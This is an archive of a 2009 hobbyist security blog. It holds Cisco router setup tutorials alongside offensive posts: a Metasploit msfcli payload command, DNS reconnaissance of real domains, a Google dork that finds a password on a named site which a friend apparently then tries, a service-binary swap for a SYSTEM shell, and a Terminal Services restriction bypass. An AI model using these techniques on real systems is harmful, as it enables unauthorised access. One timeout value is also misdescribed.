In this lab I'll have two router and I'll configure them to talk to each other

To start with you might want to clarify exactly which interfaces your router might have. This can be done visually (by looking at the device) or by using some of the excellent show commands.

The show version command will print to the screen exactly which interfaces are installed.

R0>en
Ro#show version

The show interfaces command gives details on the configuration of the interface, setting such as duplex and speed, and it will also show traffic statistics.

R0#show interfaces

If you have many interfaces in your router you can just focus on a single interface using the interface number (remember, slot/port):

R0#show interfaces fastethernet 0/0

From the output I can see that the interface isn't configured. I'll configure that port and then take another look. I'll go into configuration mode select the interface, give it an IP address and subnet mask then tell it not to be in the shutdown state. Remember, by default all ports are in a shutdown state. Another import thing to remember is if you restore your config from a backup the ports will need to be taken out of the shutdown state manually.

R0>enable
R0#configure terminal
R0(config)#interface fastethernet 0/0
R0(config-if)#ip address 192.168.1.1 255.255.255.252
R0(config-if)#no shut
R0(config-if)#exit

I saw the line come up when I was setting the port up, so now i'll ping my other router.

Wel the ping came back fine and after another look at the interface I can see it has the right IP address and the counters are updating nicely.

Another great command for looking at the interface is:

R0#show ip interface fastethernet 0/0

This shows me absolutely everything that is set or can be set on the interface.

And finally one last command for looking at the interface status in a nice condensed format is:

R0#show ip interface brief

Here I see all interfaces, what there IP addresses are and whether they are up or not.

So this has been a quick post on setting up an interface with an IP address and using some handy show commands to check the interface.

Securing My Router

2009-08-16T21:26:00.010+01:00

In this post i'll cover the following:

Giving the router a name
Setting up a enable (privilege) mode password
Setting the domain name, the clock and pointing it to a DNS server
Securing the Console and Aux ports
Creating a banner
Saving the config
Removing unnecessary services

Right. So I've got my test lab set up. To start with i'll just have one router called R0. I'll demonstrate how to configure the router and secure it.

I bring up the console after starting R0 and Terminal (on the Mac by the way) acts as if I was physically connected to the console port on the router itself. After the IOS decompresses and is loaded into RAM I'm prompted to enter the initial configuration setup. I say no to this as I will be manually configuring the router.

The first thing I want to do is give my router an Enable password. The reason for doing so is after I give the interface an IP address there is a window of opportunity for someone to look at the configuration and glean some information that I might not necessarily want them to see.

I enter the Enable mode by typing:

Router>enable

This will change the prompt from a > symbol to a hash #. Before you enter into the Enable mode there are only limited commands available, these can be viewed by typing ? at the prompt as shown in the previous post.

Remember, the hash symbol will be present whenever I am in the Enable mode, and it's from here that I can perform configuration and diagnostic tasks.

Router#configure terminal

To configure an enable password as "letmein" I type:

Router(config)#enable secret letmein

This will create a password for the Enable mode and within the configuration it will be encrypted. The password is encrypted with Type 5 encryption (I'll come back to this in a bit).

After this I'll give my router a name and a DNS domain name, set the clock and tell it what DNS Servers to use:

Router(config)#hostname R0

R0(config)#ip domain name home.local

R0(config)#ip name-server 10.0.1.1

R0(config)#exit

R0#clock set 22:00:00 16 aug 2009

Notice that my prompt changed to reflect my new name.

Okay, right now I have a Console port and an Auxilary port I want to configure.

To start with I'll secure the Console port. From the Enable mode I want to enter into Configuration mode and then into console port configuration mode. To do this i use the following commands:

R0(config)#line con 0

R0(config-line)#logging synchronous

R0(config-line)#exec-timeout 10 0

R0(config-line)#password flipper

R0(config-line)#login

R0(config-line)#exit

R0(config)#

What I have done here is selected to configure line con 0 which is the console port. The prompt changed to indicate which configuration mode I am in. I told it to set logging to synchronous, which means when the informational messages or debugging messages hit the screen it wont screw with my command. I have then set the exec-timeout to 30 minutes and 0 seconds which means my console session will be disconnected after 30 minutes of inactivity. I could have set this to not time out by using 0 minutes and 0 seconds. I have then set my console password to flipper and told it to prompt me to log in by issuing the login command. After entering those I used the exit command to come out of the line con 0 configuration and get back to the configuration mode.

I'll do the same for the Aux port as this can be used to access the router as well.

R0(config)#line aux 0

R0(config-line)#logging synchronous

R0(config-line)#exec-timeout 30 0

R0(config-line)#password flipper

R0(config-line)#login

R0(config-line)#exit

R0(config)#

After securing the ports I want to set up a banner on my router to warn any unauthorised people that they should not be accessing the router. I do this with the following:

R0(config)#banner motd % No unauthorised access %

R0(config)#exit

Different banners can be created for events such as prompt timeout, login, exec or for SLIP/PPP. They can also be real fancy and have ASCII art if you so wish.

After all this configuration I look at the running config to check all is as it should be.

R0#show running-config

Here I am able to see all the commands I have entered. Now it's important to remember that the commands take effect as soon as they are typed (and you have pressed enter of course!).

One thing that bothers me about the running config as shown in the screenshot is my console passwords and aux port passwords are in clear text. Anyone looking over my shoulder (the wife or dog) could see these and they would be well on there way to owning my router. I can fix this by turning on the password encryption service, showing the config again and then turning it off. But remember, when we configure the VTY (Telnet) ports in a later post I need to do this again otherwise the new VTY ports passwords will be clear text.

R0#configure terminal

R0(config)#service password-encryption

R0(config)#exit

R0#show running-config

R0(config)#no service password-encryption

R0(config)#end

So I have entered configuration mode, turned on the password encryption service, looked at the config, then I turned the service off.

Now looking at the config I see that the passwords are encrypted with Type 7 encryption. Now one thing about Type 7 encryption, its a piece of piss to crack, Cape in will do it as will many websites. All that Type 7 will do is stop the casual observer from seeing an easily remembered password (if thats what you use). Obviously its goes without saying that your Enable password should be different from the port passwords you set.

One last thing I noticed is the IP http server is enabled by default.

As I dont plan to use this I disable it using the "no" command

R0(config)#no ip http server

I check this has worked with another show running-config

R0#show running-config

After finally setting up my router so it is secure i save the settings from running-config to startup-config.

R0#copy running-config startup-config

R0#show startup-config

What I have done here is copied the running-config in RAM to the startup-config in NVRAM. The router will prompt me to give the configuration a name but I just press enter to select the default option that is shown in square brackets. After that completed I checked the startup-config.

In my next post I'll be looking at getting telnet and SSH set up.

Getting To Know The IOS & The Device

2009-08-15T21:53:00.009+01:00

I'll just quickly explain in the best way I can a few things about Cisco IOS. Cisco IOS is loaded from flash into RAM when the router boots (thats all the ##### you see). After the IOS has loaded you have have yourself a nice little OS running in memory. By typing a ? at whichever prompt you are at you will see the commands available. And by typing a ? after a command you will see all the subcommands available. This is super cool if you get stuck and need to know what comes next.

After IOS loads it will look in a number of places for the startup-config (NVRAM, Network), but generally it will load this from NVRAM. If it's a new router with no startup-config you'll be prompted to configure the router (don't do this though, it's boring!). As you type commands and change the configuration the changes are entered into the running-config which is in RAM. It's only when you save the running-config that this configuration overwrites the startup-config. So if a mistake is made and you mess up bad and you haven't saved the running-config to the startup-config the router can be simply rebooted to revert back to the startup-config or to a blank configuration.

So i've heard, during the CCNA exam the whole command needs to be typed (or use tab to complete) so i'll be doing that here to get familiar with the commands. In reality only enough of the command needs to be typed to make it unambiguous. So for example:

conf t

configure terminal

These are both the same command. You could press tab after typing "conf" and it would complete the command for you. The commands are not case sensitive and if you screw up IOS will tell you and show you where with a ^ symbol. I know what your thinking, sweet!

Also, IOS is really helpful, if you don't know what to type next just type ? at the end of the command and it will tell you what can come next. Have a play, you'll soon get the hang of it. I suggest though that if your going to take a Cisco exam just get used to using the tab key because if you use "sh run" instead of "show running-config" in the exam they'll have you for it!

Right, after connecting to the device, in GSN3 this is as simple as starting the device and clicking the console option. If your in Windows and physically connecting to a device you will need one of the blue cisco console cables connected to the console port on the device and HyperTerminal. HyperTerminal needs to be configured with:

Bits per second: 9600

Data bits: 8

Parity: None

Stop bits: 1

Flow control: None

Once the device boots, just type no when prompted to enter the initial configuration dialog and you'll be sitting at a > prompt. By typing ? at the prompt you'll see available options. From here you can use network diagnostic tools such as Ping and Traceroute as well as a few others.

From here we can look at the some information on the device.

Router>show version

As you can see from the output we can see all sorts of details on the device such as the types of interfaces, the memory, the configuration register (we'll get back to this later),

Also by typing show ? you will see a list of the other settings you can view, such as SNMP Statistics, Telnet user sessions, memory, IP information, Flash etc...

Router>show ?

From the user mode we are currently at you can't really do much in the way of changing the config on the device. You need to enter into Enable mode to do that. To enter into Enable mode just type enable. Notice that the prompt changes from the > to a # . This is a good indicator of what mode your in. From here type ? to see the additional options available.

Router#?

Have a look around at the additional options and the new show options ( show ? ) and to return to user mode just type disable.

In this post we have just looked at the IOS and started to get familiar with it. Notice how we have been able to navigate round the IOS pretty freely without needing any credentials. In the next post i'll be locking the router down.

And On The Cisco Menu Tonight.....

2009-08-15T21:43:00.019+01:00

This post will act as my main link page to my up and coming posts. As I post an entry I'll link the entries below. This will make things much easier to find.

Routers

1. Getting to know IOS & the Cisco device

2. Securing the router

3. Backing up and upgrading the IOS and configuration

4. Configuring SSH on a Router

5. Configuring Interfaces

6. Gathering information on connected devices - CDP

7. Password recovery

8. Authenticating with RADIUS

9. IP Routing - Static Routing

10. IP Routing - RIP

11.IP Routing - OSPF

12. IP Routing - EIGRP

13. Standard ACLs

14. Extended ACLs

15. Time Based ACLs
16. NAT - Overload

Switches

1. Initial switch configuration
2. VLAN configuration
3. Port security
4. Logging

5. Port Spanning

More to follow soon.........

A Bit Of A Change - Yet Another Update

2009-08-14T21:07:00.011+01:00

In the immortal words of Peter Doherty "Promises promises, I know, you've heard them all before...."

Okay, let me start with an apology to anyone who takes the time to visit my blog. Recently I've been crap at getting stuff out on the blog, and I've explained the reasons as being my spare time, which there's little when you have a 10 month old daughter to prioritise, is mostly spent with my head in my CCNA study book. So trying to find time to play with all the great tools on BackTrack has really taken a hit. So i've decided to change my plan slightly.

For the foreseeable future, or at least until I have passed the CCNA and maybe the Security specialisation after that, I'm going to focus on Cisco related posts. Originally The aim of this blog was for me to spend time learning something and then blog about it which then hopefully might help anyone who stumbles across it. Blogging what I have been learning also helps me to remember stuff and an added bonus is my blog serves as an accessible reference for me to use when i need to refer back to something in the future.

Great, that out the way i'll just describe my setup and then i'll get down to some nitty gritty Cisco IOS fun.

The book I am using to study for the CCNA is CCNA - Cisco Certified Network Associate Study Guide by Todd Lammle. This book was recommended to me by a mate and I really couldn't recommend it enough. The book was worth every penny and his writing style makes a joy to read.

What I'm using for my lab is a Cisco 2950 switch (that I got out of a bin!) and the GNS3 software. GNS3 is a program (windows, linux and Mac) that allows you to take a IOS image from a router or pix firewall and sort of run it in an emulator so you can access it and configure it just like the real device. Within the software you can build networks of routers, switches, Firewalls and PC's. Very cool stuff and very free too. Which is always nice! Getting up and running is pretty easy with GNS3 but there are plenty of videos on YouTube if you get stuck. You'll also need a couple of IOS's as well (cough cough bittorrent cough)

So once you have GNS3 up and a IOS to play with, you can get down to building your virtual test lab to get your feet wet without screwing up any physical devices.

All you then need to do is right click on a device, start it up and then select Console.

Bingo! Your very own Cisco test lab to play with whilst you learn.

OK, thats it for this quick update post, I will be posting again within the next few days on configuring a router.

I really hope this set of posts are useful to someone other than myself.

Cheers

Syn

Backtrack 4. MSF - Part 1

2009-08-03T21:51:00.012+01:00

A couple of emails have come just at the right time to help me get back into the swing of things. They were both regarding Metasploit which fits nicely into my planned blog entries about tools from the BackTrack disto.

I plan to focus the next series of post on the basics of Metasploit then i hope to be moving into more advanced features that I think are cool within the framework. Please bear in mind though that I am in no way an expert on the MSF so I'll be learning as I go along, which is the whole point of my blog anyway. To learn and to share. I have covered some of the stuff i'll be blogging about in previous posts but as I don't use MSF every day i'll go over some of it again as a reminder for myself.

Part 1 - Which Metasploit looks good on me?

As I'm basing these posts on Metasploit and as I mentioned previously I wanted to focus on the new BackTrack 4 tools i'll dispense with the installation instruction. Metasploit can be found under BackTrack > Penetration > Framework Version 3.

Now you have a few options here:

msfcli
msfconsole
msfgui
msfweb

All the flavours of the framework have a purpose but as far as i'm concerned as you get familiar with the framework you'll probably find one that works best for you. When I first started with the Framework I liked to use msfgui and msfweb. Both of these were pretty similar wen used locally but msfweb does have the benefit of being able to run remotely because as indicated in the name it's a web server version. Whenever I go back to Metasploit after some time I often like to use msfgui, as this allows me to easily navigate through the list of exploits, payloads or auxiliary modules and to read the descriptions of them to find exactly what will work best for the thing i'm doing rather than just throwing anything and everything at a target. That type of behavior is very uncool and will get you noticed.

Now before I go any further I should take a few minutes to explain what the Metasploit Framework is and what it can do. The framework is a collection of programs and scripts that can be used amongst other things to identify, exploit targets. Apart from the 4 options listed above there are many other tools such as msfpayload that can be used for creating standalone executables or msfencode that can be used to bypass antivirus with those executables. These might are fantastic tools that might not be obvious if you don't have a look for them. The framework is written in Ruby and is open source so it can be extended and tweaked to suit individual needs. Other script such as those written by Dark Operator can be integrated into the framework to enhance the functionality.

I really encourage anyone interested in Metasploit to have a good look around in the /pentest/exploits/framework3/ directory. There is also documentation and samples available.

Okay, back to the versions. I'm sure there are many other uses but here's what I have used them for so far:

msfcli

If your very familiar with the syntax and know exactly what is you want to do then msfcli might be the option for you. I have used this in the past to create msfpayloads and it works very well.

An example of using msfcli might be:

./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=2482 RHOST=192.168.1.110 DisableCourtesyShell=TRUE E

msfconsole

I really like the working in the console, it's pretty intuitive and i always feel cooler working from the commandline. Navigating through the console is pretty easy with the tab completion and help options. After becoming familiar with metasploit I found that I can work most effectively in the console.

msfgui

As mentioned above I like to use msfgui to familiarize myself with exploits, payloads and options. But if you find yourself living in msfgui you really need to "Man up Nancy Boy!" and get to msfconsole, you'll feel much better about yourself if you do.

msfweb

Similar thoughts as msfgui but it can also be configured to connect to remotely (as can msfd as i'll show in a later post). First launch msfweb and then point a browser at at (as described in the console message).

Okay, so this was brief overview because I wanted to get a post out and it may be a bit boring for anyone already familiar with MSF. I'll be going into more detail in upcoming posts and I hope things will get a lot more exciting as I cover the following:

Updating the Framework.
Navigating through msfconsole.
Using Auxiliary modules, Exploits and Payloads.
Launch successful attacks against a vulnerable host.
Adding new functionality with external scripts.
Integrating other tools with MSF
Anything else i can think of.........

Back soon.......

A Bad Month!

2009-07-30T21:52:00.002+01:00

July has been a really crazy month. It started off with my wife nagging me to follow through on my New Years Resolution to get 2 certifications this year. I love to make resolutions like this but then I get playing with MetaSploit, Maltego and Powershell and everything else gets forgotten.

So the beginning of the month was gearing up for the Security+. To tell the truth it was a pretty easy exam but I'm glad I did it. I would love to work in the security field one day and I guess this shows an understanding of the fundamentals. Then I was planning to take a Citrix certification but I figured a CCNA seemed so much more fun so I went with that instead. So hear I am with my head buried in Cisco books and an old router and switch being configured six ways to Sunday! I definately have a new found respect for the guys out there with their Cisco certs, this stuff is pretty hardcore when you get your hands dirty!

Anyway, back to the point. I know I intended to get a post a week out as I have in the past but things just got on top of me. I will try harder for August and get back on track. Thanks to everyone who has sent me encouraging comments and emails.

Looking forward to August.

Syn

BackTrack 4 - DNS 1

2009-07-02T21:47:00.007+01:00

Okay, so I've finished a week of studying, passed the exam today and now I have had a few minutes to get to grips with one or two of the DNS tools on the BT4 CD. I'm gonna start off easy and look at a couple of my favorite DNS tools and then move onto some that I'm not too familiar with. I decided to start with DNS because that usually where thing start for me, well that and Google but lets leave that for now.

Fierce

I was glad to see that Fierce is still in BT. Fierce is one of my favorite DNS tools and I have blogged about it ion the past. It always gets the job done and underneath it's simple exterior it's doing quite alot (maybe RSnake worked for Apple once).

Fierce starts off by using your DNS to get the targets DNS and then hops on over to that DNS to do it's work. All pretty cool stuff eh. Fierce will try to dump the DNS (although unlikely this will work) and then it will start to use it's name list (hosts.txt) to guess the name of hosts out there. Although not a bad wordlist I suggest you add to it as you come across anything in your travels. Anything Fierce guesses correctly it will perform reverse look ups of a few of the addresses around the correctly guessed one (also configurable) or with -wide it will scan the whole class C subnet of any host it finds. Noisy but effective.

The command I used to scan insecure.org with 10 threads and scanning the class C of any found IPs was:

./fierce.pl -wide -threads 10 insecure.org

DNSRecon

Although this found me some good results what I also wanted to do was look in between those IP's in the reverse lookup. Because if the target has a block of IP's and nested somewhere in the middle of them is host on another domain then that's interesting. For this task I Dark Operators DNSRecon ruby script.

An example of running the script against on of the subnets that Fierce located gave up some interesting (but very obvious) results:

ruby dnsrecon.rb -r 64.13.134.1 64.13.134.254

Surprise surprise nmap.org!

Well there's plenty more to go, I just wanted to make a start on this set of posts.

Happy hunting!

BackTrack4 Pre-Release

2009-06-23T20:07:00.004+01:00

I have just grabbed a copy of the latest release of BackTrack4 and it's gotta be the best yet. It works perfectly in a parallels VM and will soom be making it's way onto my hacktop.

From the start of July, each week I'll be picking a tool from the distribution and digging down into it to hopefully demonstrate the usage and possible scenarios where the tool may be employed.

This is something I have been meaning to do for quite a while and now with the new release upon us it seems like the perfect chance. I know I'll certainly benefit from becoming familiar with these tools and maybe someone else will get something from my posts as well.

Syn

An Accidental Google Hack

2009-06-10T18:54:00.011+01:00

Whilst looking at the security of a web application today I was able to extract the usernames and passwords using SQL Injection, which was nice. Well being a bit of a newbie after I got the passwords I was confused about the encoding/encryption. I managed to figure it out by using the encoding page on Clez.net and by encoding/decoding one of the password that I knew the cleartext of (my test account). It was using Base64 reversed. I also noticed that many of the passwords were =Qmcvd3czFGc which decoded to password (after reversing it).

Now the accidental bit.

My friend Bob got to hear of this and decided to Google the reverse Base64 string "=Qmcvd3czFGc". He got a few hits, but the first result was real interesting.

It seems his fist hit returned email addresses, login names, weird strings that might be base64 reverse encoded passwords (he'll look into that later I imagine).

Then Bob put his Google Fu to work. Seeing that the site had some interesting details available to just about anyone he wondered just how much Google had indexed.

site:yimwhan.com filetype:txt intext:password

Oh dear...within seconds Bob found a password. Surely it was old and probably not active anymore?

Well we all know Bob, his curiosity gets the better of him.

Bob just couldn't help himself could he!

I think this clearly demonstrates that anything you send can and probably will be picked up by Google and someone like Bob might just stumble across it at some time in the future. It might be an idea to think before you post!

UPDATE:

I have also posted this on the Bob Stories Site.

Get Your Hacking Videos Here!

2009-06-07T10:54:00.005+01:00

Well not here as in the SynJunkie blog but here, as in the Learn Security Online site. The guys over at LSO have revamped the site and it's looking pretty sweet.

Whenever I have a few minutes spare I love to watch how some of the experts out there attack systems and use the tools that projects such as BackTrack and Metasploit make available to us. Or if I am learning something new it's great to see a demonstration of a tool or process. So the guys over at LSO have done all the hard work for us and linked to them all. As well as all of there own vidoes there are links to over 80 non-LSO videos.

So if you want to see how the experts perform SQL Injection or run the latest MetaSploit exploits then check out the video section at Learn Security Online.

Getting Closer to God with Privilege Escalation

2009-06-04T13:43:00.005+01:00

Whilst assessing vulnerabilities in the PC build I have I found the following. Now I always get pissed off when I hear people rattle on about the AT command and using that to get a SYSTEM shell. In my experience after XP SP2 you’re required to be an admin to run AT, so what’s the point really?

So rather than just focussing on holes in the Microsoft system, which frankly I'm not really talented enough to find much there, I decided to look at the configuration and implementation. In my opinion I would have much better luck looking for mistakes made by people not necessarily trying to secure a system but more trying to get a system to work.

In this post I'll focus a common mistake made by the guys who build the system which allows a standard user to escalate to have full system privileges.

Looking at Services

It would be nice to use WMIC to look for services that are in a directory that I can write to and that start automatically:

wmic service get name,startmode,pathname | find /i "auto"

However, when trying to run WMIC I get an error telling me that I need to be a member of the Administrators group. I could just go to the Services.msc but this means that I have to go through each service to get that path to the executable. A better tool I found for this is MSInfo32.exe

As can be seen in the screenshot I can quickly scan down the autostarted services for ones that have paths that I can write to. I also need the service to be running with an account with some decent privileges.

OK, VNC looks pretty good.

I go to the directory that VNC runs from and rename the executable. I copy Taskmgr.exe from System32 to the VNC directory and rename it as the VNC executable.

After a restart I see that I have no VNC in the system tray, so I go to the Services.msc and start it. Task Manager starts up for about a minute and then closes. Ok, that’s good. I start the service again and quickly launch a command shell before it closes, great now I have my system command shell. From here I can add accounts, change settings, install software etc... But maybe I want my full desktop. I launch Taskmgr.exe from the command shell, kill explorer from the process list and the launch explorer from File menu. Fantastic, I have a whole desktop running as System, now I really am closer to god!

Windows Eventlog Fun with Free Tools

2009-05-09T11:34:00.004+01:00

This week at work I was asked to find why a specific account was constantly being locked out. Sounds pretty easy eh. Well the thing is, this was a service account and I have quite a lot of DC's where this could be happening from.

I did a little research on my favorite site www.ultimatewindowssecurity.com and ran a few tests to make sure I new what I was looking for and I set about getting the remote logs to my site so I could perform some analysis.

I started out with Dumpevt from Somarsoft. I could just grab a single event log using the following:

dumpevt.exe /computer=SERVER01 /logfile=sec /outdir=c:\Temp\Dump /all

But then I figured that I really needed to automate the retrieval of the logs so I threw in a FOR loop to go through a list of servers:

FOR /f %i in (c:\servers.txt) do @dumpevt.exe /computer=%i /logfile=sec /outfile=c:\Temp\Dump\%i-SecLog-%random% /all

As I sat back and waited...and waited .....and waited I figured that this probably wasn't the most efficient use of time or bandwidth as the logs were all over 250MB in size. I took the logs I had so far and opened them in Mandiant's excellent tool Highlighter. Well that's when I hit my second problem. Highlighter took absolutely ages to open the logs using my measly 512MB of RAM.

So I needed a way to parse the logs on the server and return just the events of interest. I then turned to the Microsoft tool EventComb. This tool is allowed me to search through a list of servers for just the events I needed. It had predefined searches in that could be useful. Eventcomb also allowed me to set the amount of threads I wanted to run and allowed me to search through events within a specific date range. The events were then output from each server to individual text files which allowed me to search through them easily with highlighter.

Whilst I was having all this fun I also wrote a few scripts in log parser for fun. Here's a couple of the scripts I put together in LogParser and the commandline to run them:

LogParser.exe file:logon-failure.sql -i:EVT -o:datagrid

------------logonfailure.sql--------
Select
ComputerName, Timegenerated AS LogonTme, EventID, EventType, EventCategoryName,
extract_token(strings, 1, '|') AS ComputerName,
extract_token(strings, 0, '|') AS User,
extract_token(strings, 2, '|') AS Logon_Type,
extract_token(Message, 0, ':') AS Message,
extract_token(Message, 2, ':') AS Reason

FROM \\Server01\Security
WHERE EventID IN (

529)
--------------end--------------------

And for the account lockouts here's an example of throwing the script into a loop that I could just cut and paste onto the commandline to output the results from multiple servers into a csv file:

FOR /f %i in (c:\servers.txt) do @LogParser.exe -i:EVT -o:csv -headers:auto -Filemode:0 "Select ComputerName, Timegenerated AS LogonTme, EventID, EventType, EventCategoryName, extract_token(strings, 1, '|') AS ComputerName, extract_token(strings, 0, '|') AS User INTO C:\failedlogons-%random%.csv FROM \\%i\Security WHERE EventID IN (644)"

My conclusion from this was whilst I really like LogParser it does take a while to get it tuned to find exactly what I wanted. However, it is an extremely flexible tool for searching many different types of logs and if you get the Syngress book there is a great example of creating an IDS tool with LogParser. The benefit of LogPaser is that it can be scripted to run regularly as a scheduled task for arching those events you might be interested in.

EventComb was easy to use, let me save my searches for reuse later and used along with Highlighter proved to be just what I needed to get to the detail very quickly and resolve my problem.

Resources
http://www.ultimatewindowssecurity.com/securitylog/encyclopedia/Default.aspx
http://www.systemtools.com/somarsoft/
http://www.mandiant.com/software/highlighter.htm
http://support.microsoft.com/kb/308471
http://www.microsoft.com/technet/scriptcenter/tools/logparser/default.mspx

Toying With Terminal Services - Part 1

2009-05-02T19:19:00.010+01:00

Whilst on holiday this week I began to get bored in the evenings with no internet access and whilst everyone else watched TV. So I decided to set myself a little VM lab up on my Mac and play with Terminal Services.

My aim was pretty simple, from a very locked down desktop I wanted to bypass the restrictions put in place and see how I could get to programs that the admin had tried to prevent me from getting to.

As we can see, all I have access to is a desktop with Notepad. No right click, Internet Options are restricted, the desktop is extremely locked down by group policies.

So once again I'm on the hunt for holes in the group policy so I can enumerate the domain and get to websites to post data or for additional tools etc...

As I start to hunt around I figured instead of accessing the desktop as I am supposed to, what if I configured my RDP client to launch one of the programs that I need straight after login instead of going to the desktop.

And what do you know........Bingo!

Although in group policy the admin could have restricted access to cmd.exe it's pretty hard to run login scripts etc.. so most admins won't, they'll just make it difficult to get to.

Of course this worked for launching an MMC also, and pretty much any program. Again the snappins for MMC's can be restricted in group policy but how many admins are going to go to that level?

Coming up.......More Terminal Services goodness.

Powershell vs Conficker

2009-04-23T23:38:00.003+01:00

Earlier in the week I found a few PC's that were infected with the Conficker malware. After looking at the infected PC's I noted that the infected file that was detected always had the following characteristics.

Always a dll file in the Windows\system32 directory
Always exactly the same size (155858 bytes)
Always has ReadOnly, System, Archive and Hidden attributes set

Out of curiosity I wrote the following script to pull from AD a list of servers, ping them and then search through the System32 directory on servers that were up for dll files with those attributes set.

I found 3 servers that had dodgy AV signatures and infected dll files.....Powershell wins!!

#Get the server list
$ServerList = @(get-qadcomputer -OSName "Windows Server*"); $Servers = $ServerList | foreach {$_.Name}; Write-host "These Servers will be checked" -fore green ; $Servers

#Ping Server
function Find-Infection{
$ping = gwmi -q "SELECT * FROM Win32_Pingstatus WHERE Address = '$serv'"
if($ping.statusCode -eq 0) { Write-Host "Checking $Serv Now" -fore Yellow;

#Check for File
gci -path \\$serv\c$\windows\system32 -filter *.dll -force | where { $_.attributes -eq "ReadOnly, Hidden, System, Archive" }
}
else { write-host "$serv is not responding" -for Red}
}
foreach ($serv in ($servers))
{
Find-Infection | select Length,Mode,FullName | ft -auto
}

Yet Another Security Podcast

2009-04-19T22:00:00.005+01:00

I joined Twitter last night. I'd held off for quite a while but figured what the hell, everyone else is lovin it so it couldn't be too bad. Well within a few hours of joining I found a few people out there that I figured would have similar interests so I 'followed' them.

Now anyone who knows me is aware that I have a horrible commute and I'm always looking for new podcasts to make the trip to and from work as educational as possible. Well thanks to following Mubix I learnt of the Exotic Liability Podcast. They have about 6 shows out so far and interview some of the big names in the security/hacking arena such as Val Smith and Chris Gates.

Exotic Liability is a show thats along the same lines as Security Justice and Securabit, so if you like those shows then this is one for you. For the moment though, although Exotic Liability is showing promise I think for now though I'll be keeping Risky Business, Paul dot com and Radio Free Security as the top 3 on my playlist.

Where's Syn?

2009-04-10T10:10:00.003+01:00

This is just a quick note to say (for anyone that's interested) that I'm taking a short break throughout April to work on some fresh new ideas for future posts. I'm also working on a new story and I hope to have it up soon.

In the meantime you should check out the Command Line Kung Fu blog, it really is very good.

Syn

Abusing Citrix

2009-04-10T10:05:00.002+01:00

This is really just a placeholder for my past and hopefully upcoming posts on fun ways to play with Citrix or Remote Desktop restrictions.

Part 1

Part 2

Part 3

Part 4